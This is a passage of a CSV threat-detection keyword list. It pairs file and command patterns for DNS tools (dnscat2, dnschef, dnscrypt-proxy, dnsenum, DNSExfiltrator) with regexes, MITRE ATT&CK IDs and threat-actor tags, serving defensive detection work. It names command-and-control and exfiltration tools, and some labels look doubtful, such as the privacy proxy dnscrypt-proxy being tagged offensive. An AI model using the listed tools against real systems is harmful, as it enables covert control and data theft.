BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41210" "*dnscat2-*.zip*",".{0,1000}dnscat2\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41211" "*dnscat2.*",".{0,1000}dnscat2\..{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41212" "*dnscat2.ps1*",".{0,1000}dnscat2\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","41213" "*dnscat2/*",".{0,1000}dnscat2\/.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41214" "*dnscat2-server*",".{0,1000}dnscat2\-server.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed 
to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41215" "*dnscat2-win32.exe*",".{0,1000}dnscat2\-win32\.exe.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41216" "*dnschef --fakeip 127.0.0.1 -q*",".{0,1000}dnschef\s\-\-fakeip\s127\.0\.0\.1\s\-q.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41217" "*dnschef.exe *",".{0,1000}dnschef\.exe\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41218" "*dnschef.logger*",".{0,1000}dnschef\.logger.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41219" "*dnschef.py *",".{0,1000}dnschef\.py\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41220" "*dnschef.utils*",".{0,1000}dnschef\.utils.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. 
A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41221" "*dnschef-ng-main*",".{0,1000}dnschef\-ng\-main.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","41222" "*DNSCrypt client proxy*",".{0,1000}DNSCrypt\sclient\sproxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41225" "*DNSCrypt/dnscrypt-proxy*",".{0,1000}DNSCrypt\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - 
T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41226" "*dnscrypt-autoinstall*",".{0,1000}dnscrypt\-autoinstall.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41227" "*dnscrypt-proxy -resolve*",".{0,1000}dnscrypt\-proxy\s\-resolve.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41228" "*dnscrypt-proxy -service*",".{0,1000}dnscrypt\-proxy\s\-service.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41229" "*dnscryptproxy.exe*",".{0,1000}dnscryptproxy\.exe.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - 
TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41230" "*dnscrypt-proxy.exe*",".{0,1000}dnscrypt\-proxy\.exe.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41231" "*dnscrypt-proxy.socket*",".{0,1000}dnscrypt\-proxy\.socket.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41232" "*dnscrypt-proxy.toml*",".{0,1000}dnscrypt\-proxy\.toml.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41233" "*dnscrypt-proxy-android_arm-*.zip*",".{0,1000}dnscrypt\-proxy\-android_arm\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - 
TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41234" "*dnscrypt-proxy-android_arm64-*.zip*",".{0,1000}dnscrypt\-proxy\-android_arm64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41235" "*dnscrypt-proxy-android_i386-*.zip*",".{0,1000}dnscrypt\-proxy\-android_i386\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41236" "*dnscrypt-proxy-android_x86_64-*.zip*",".{0,1000}dnscrypt\-proxy\-android_x86_64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41237" "*dnscrypt-proxy-dragonflybsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-dragonflybsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as 
DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41238" "*dnscrypt-proxy-freebsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41239" "*dnscrypt-proxy-freebsd_arm-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_arm\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41240" "*dnscrypt-proxy-freebsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41241" 
"*dnscrypt-proxy-linux_arm-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_arm\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41242" "*dnscrypt-proxy-linux_arm64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_arm64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41243" "*dnscrypt-proxy-linux_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41244" "*dnscrypt-proxy-linux_mips-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41245" "*dnscrypt-proxy-linux_mips64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41246" "*dnscrypt-proxy-linux_mips64le-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips64le\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41247" "*dnscrypt-proxy-linux_mipsle-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mipsle\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41248" "*dnscrypt-proxy-linux_riscv64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_riscv64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt 
v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41249" "*dnscrypt-proxy-linux_x86_64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_x86_64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","#linux","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41250" "*dnscrypt-proxy-macos_arm64-*.zip*",".{0,1000}dnscrypt\-proxy\-macos_arm64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41251" "*dnscrypt-proxy-macos_x86_64-*.zip*",".{0,1000}dnscrypt\-proxy\-macos_x86_64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41252" "*dnscrypt-proxy-master*",".{0,1000}dnscrypt\-proxy\-master.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible 
DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41253" "*dnscrypt-proxy-netbsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-netbsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41254" "*dnscrypt-proxy-netbsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-netbsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41255" "*dnscrypt-proxy-openbsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-openbsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41256" 
"*dnscrypt-proxy-openbsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-openbsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41257" "*dnscrypt-proxy-solaris_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-solaris_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41258" "*dnscrypt-proxy-win32-*.zip*",".{0,1000}dnscrypt\-proxy\-win32\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41259" "*dnscrypt-proxy-win64-*.zip*",".{0,1000}dnscrypt\-proxy\-win64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41260" "*DNS-Enum-*-*.log*",".{0,1000}DNS\-Enum\-.{0,1000}\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","41261" "*dnsenum.pl*",".{0,1000}dnsenum\.pl.{0,1000}","offensive_tool_keyword","dnsenum","multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.","T1218 - T1018 - T1190 - T1590 - T1012","TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/fwaeytens/dnsenum","1","1","#linux","N/A","N/A","7","634","139","2019-10-08T19:58:40Z","2014-01-10T14:47:09Z","41262" "*dnsExfiltrator.exe*",".{0,1000}dnsExfiltrator\.exe.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","41263" "*DNSExfiltratorLib*",".{0,1000}DNSExfiltratorLib.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
